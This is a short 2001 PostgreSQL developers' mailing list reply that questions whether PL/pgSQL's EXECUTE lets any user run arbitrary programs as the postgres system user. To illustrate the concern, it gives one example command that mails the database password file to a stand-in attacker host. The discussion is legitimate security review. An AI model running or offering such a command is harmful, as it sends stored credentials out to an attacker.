Re: Security hole in PL/pgSQL

From: KuroiNeko <evpopkov(at)carrier(dot)kiev(dot)ua>
To: pgsql-hackers(at)postgresql(dot)org
Subject: Re: Security hole in PL/pgSQL
Date: 2001-01-29 16:55:14
Lists: pgsql-hackers

> Huh? This would only be true if all operations inside plpgsql are
> executed as superuser, which they are not. Seems to me the existing
> defense against non-superuser using COPY is sufficient.

Sorry if I missed the point, but if I got it right, Pl/Pgsql EXECUTE will
allow execution of any program via exec*() call? If so, this will allow any
(system) user to execute arbitrary code as postgres (system) user, right?
If so, how can something like

EXECUTE '/bin/mail badguy(at)evilhost < /usr/pgsql/data/pg_pwd';

be avioded?